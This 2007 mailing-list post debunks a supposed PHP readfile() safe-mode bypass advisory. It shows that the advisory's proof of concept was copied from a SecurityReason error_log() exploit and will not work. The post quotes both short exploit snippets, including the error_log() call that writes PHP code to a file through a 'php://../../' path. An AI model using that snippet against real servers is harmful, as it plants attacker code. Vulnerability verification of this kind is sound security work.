[VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
GM darkfig
gmdarkfig at gmail.com
Sat Mar 31 13:32:23 UTC 2007
The readfile() vulnerability doesn't exist. For example, the poc:
<?php $file=""; readfile("<? echo \"cx\"; ?>", 3,"php://../../".$file); ?>
Quote from php.net:
int readfile ( string $filename [, bool $use_include_path [, resource $context]] )
The first argument isn't a filename, the second is not a bool (true/false).
The code quoted by the author is the code of the error_log function,
not the readfile function. In his poc he just changed the function.
Quote from SecurityReason:
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
Quote from the fake:
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
This will not work.